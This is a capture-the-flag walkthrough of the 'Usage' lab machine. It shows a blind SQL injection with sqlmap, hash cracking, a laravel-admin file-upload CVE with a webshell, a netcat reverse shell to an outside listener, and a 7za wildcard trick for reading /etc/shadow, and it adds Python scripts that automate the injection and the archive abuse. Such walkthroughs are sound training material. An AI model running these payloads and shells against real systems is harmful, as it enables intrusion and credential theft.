Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV 10.10.11.18
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-15 13:23 CST
Nmap scan report for 10.10.11.18
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
|_ 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.51 seconds

Port 80

The site redirects to usage.htb, so a hosts entry is needed:

10.10.11.18 usage.htb

A blog site with registration and login; the admin link points to admin.usage.htb, which needs a hosts entry too:

admin.usage.htb

Admin login page:

usage.htb

Registration and login offer nothing interesting, but on the forgot-password form the usual single quote produces an error, so this is a basic SQL injection. These two payloads confirm it. Note that in MySQL 1/0 inside a SELECT returns NULL rather than raising an error, so the pair is told apart by whether the ='a' comparison still holds (the row for the e-mail comes back or not), i.e. a boolean differential, not by an error message:

xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a

sql injection

Blind injection, so hand it to sqlmap (sql.txt is the saved HTTP request of the forgot-password form):

sqlmap -r sql.txt -v 3 --level 3 --threads 10
sqlmap -r sql.txt -v 3 --level 3 --threads 10 --dbs
sqlmap -r sql.txt -v 3 --level 3 --threads 10 -D usage_blog --tables
sqlmap -r sql.txt -v 3 --level 3 --threads 10 -D usage_blog -T admin_users --dump

admin
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2
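The mechanics behind those two payloads, and the character-by-character extraction that sqlmap then automates, as an added example that is not part of the original writeup. The target is simulated with an in-memory SQLite database: the table and column names, the registered e-mail address and the stored hash are constructed for the demo (only the admin username follows the page), and SQLite's unicode() stands in for MySQL's ascii():

```python
import sqlite3

# Constructed stand-in for the usage_blog database: table and column names,
# the registered e-mail and the stored hash are made up for this demo.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE users (email TEXT);
CREATE TABLE admin_users (username TEXT, password TEXT);
INSERT INTO users VALUES ('attacker@usage.htb');
INSERT INTO admin_users VALUES ('admin', '$2y$10$demoHashNotReal');
""")


def forgot_password(email: str) -> bool:
    """Simulates the vulnerable endpoint: the e-mail is concatenated into the
    query and the response only reveals whether a matching user exists."""
    sql = f"SELECT email FROM users WHERE email = '{email}'"
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:        # a broken query -> error page, no match
        return False


def oracle(condition: str) -> bool:
    """Ask one yes/no question using the page's CASE payload. 1/0 evaluates
    to NULL (MySQL and SQLite alike) instead of raising, so a true condition
    makes ='a' fail and hides the row; a false one returns 'a' and the row
    for our own registered address comes back. Each probe is one request."""
    payload = (f"attacker@usage.htb' AND (SELECT CASE WHEN ({condition}) "
               f"THEN 1/0 ELSE 'a' END)='a")
    return not forgot_password(payload)


def extract(expr: str, max_len: int = 64) -> str:
    """Recover the string an SQL expression evaluates to, one character at a
    time with a binary search over its code point: the boolean-based blind
    technique sqlmap applies once it has confirmed the injection.
    unicode() is SQLite's ascii(); use ascii()/ord() against MySQL."""
    out = []
    for pos in range(1, max_len + 1):
        if not oracle(f"length(({expr})) >= {pos}"):
            break                       # ran past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


# Same row sqlmap dumped above, expressed as the scalar subquery we smuggle in.
ADMIN_HASH_QUERY = "SELECT password FROM admin_users WHERE username='admin'"

if __name__ == "__main__":
    print(extract(ADMIN_HASH_QUERY))   # -> $2y$10$demoHashNotReal
```

Each oracle() call is one HTTP request in practice, and the binary search costs about seven requests per character, so dumping a 60-character bcrypt hash this way takes a few hundred requests; that is the cost the --threads option in the sqlmap commands above is spreading out.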

Crack the bcrypt hash with john against rockyou:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

whatever1

admin.usage.htb

Log in to the admin panel with these credentials:

It is laravel-admin; the version, 1.8.17, is shown in the bottom-right corner.

CVE-2023-24249

Searching on that version turns up CVE-2023-24249, an arbitrary file upload in laravel-admin: the avatar upload in the user settings accepts a PHP webshell:

reverse shell

Uploaded files are cleaned up quickly, so use the webshell right away to spawn a reverse shell to a listener on 10.10.16.4:4444, then upgrade it to a PTY:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.4 4444 >/tmp/f

python3 -c 'import pty;pty.spawn("/bin/bash")'

user flag

The dash user's home directory:

Privilege escalation enumeration

dash's home directory contains some monit-related files; reading them reveals a password:

3nc0d3d_pa$$w0rd

Listing the home directories shows another user, xander. The password is reused for xander, and xander may run /usr/bin/usage_management with sudo:

usage_management

Running usage_management offers three options; strings on the binary shows the commands behind them:

/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
/usr/bin/mysqldump -A > /var/backups/mysql_backup.sql

7za

From the strings output, the first option (backup) changes into /var/www/html and then calls 7za with a shell wildcard:

/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *

The wildcard is expanded by the shell, so every file name in /var/www/html becomes an argument to 7za running as root. 7za treats any argument that begins with @ as a list file of paths to add, and the -- only stops switch parsing (the p7zip build on this box still honours @ list files after it; check the version you are facing). Since we can create files in /var/www/html, a file named @something whose content is a path gets that path added to the archive, i.e. we can get arbitrary files added to the target archive:

Privilege escalation & root flag

Get the file we want (/etc/shadow here) added to the archive by running the backup option, then extract /var/backups/project.zip and read it:

shadow

root:$y$j9T$eHRVEjBacjX.aL3Dv.ayh/$ya7Anf39wpVrmChSihyT1sxtFg.2JLtN/z5oNXKDRc4:19809:0:99999:7:::
dash:$y$j9T$vnXc5wuMp/3C1Ao0PfIZS1$bR.rwyVqBNeMUHDNze/yT./JKQ.x9D4CsL3EqgMtkG6:19809:0:99999:7:::
xander:$y$j9T$.0U.eu0EIIaUNyu7iFA1x/$ScdmpKaag.GHK3VFzdBCn19UT1eBLRCO7ghAvz7s0u0:19658:0:99999:7:::
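The list-file abuse behind that step, rehearsed as an unprivileged user in a throwaway directory. This is an added example, not the writeup's own commands: it assumes a 7-Zip binary (7za, 7z or 7zz) is on PATH and uses the exact flags usage_management runs; the directory names and the "secret" file content are constructed. smuggle_into_archive() returns None when no 7-Zip is installed and False when the build in use does not honour @ list files after --, so it doubles as a check of that caveat before relying on it:

```python
import os
import shutil
import subprocess
import tempfile


def find_7z():
    """First 7-Zip binary on PATH, or None if there is nothing to demonstrate."""
    for name in ("7za", "7z", "7zz"):
        path = shutil.which(name)
        if path:
            return path
    return None


def backup_command(seven: str, archive: str, workdir: str) -> list:
    """The argv usage_management runs, with the shell's '*' expansion done by
    hand (no dotfiles, sorted like a glob). Any expanded name that starts
    with '@' is taken by 7-Zip as a list file of paths to add; '--' only
    stops switch parsing."""
    names = sorted(n for n in os.listdir(workdir) if not n.startswith("."))
    return [seven, "a", archive, "-tzip", "-snl", "-mmt", "--"] + names


def smuggle_into_archive(target: str, workdir: str, archive: str):
    """Plant '@shadow' in workdir holding the path of `target`, run the backup
    command from workdir and report whether `target` ended up in the archive.
    None: no 7-Zip available. False: archive missing or target not archived
    (this build ignores '@' after '--'). True: the trick works here."""
    seven = find_7z()
    if seven is None:
        return None
    with open(os.path.join(workdir, "@shadow"), "w") as f:
        f.write(target + "\n")               # the list file: one path per line
    subprocess.run(backup_command(seven, archive, workdir), cwd=workdir,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    if not os.path.exists(archive):
        return False
    listing = subprocess.run([seven, "l", archive],
                             capture_output=True, text=True).stdout
    return os.path.basename(target) in listing


def demo():
    """Unprivileged rehearsal: outside/secret.txt plays /etc/shadow and html
    plays /var/www/html, all under a temp dir that is removed afterwards."""
    work = tempfile.mkdtemp()
    try:
        html = os.path.join(work, "html")
        secret = os.path.join(work, "outside", "secret.txt")
        os.makedirs(html)
        os.makedirs(os.path.dirname(secret))
        with open(secret, "w") as f:         # constructed content, not a real hash
            f.write("root:$y$j9T$constructed:19809:0:99999:7:::\n")
        return smuggle_into_archive(secret, html, os.path.join(work, "project.zip"))
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

On the box the same idea is applied as xander in /var/www/html: the list file names /etc/shadow, the sudo'd backup option writes it into /var/backups/project.zip as root, and unzipping the archive yields the hashes shown above.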
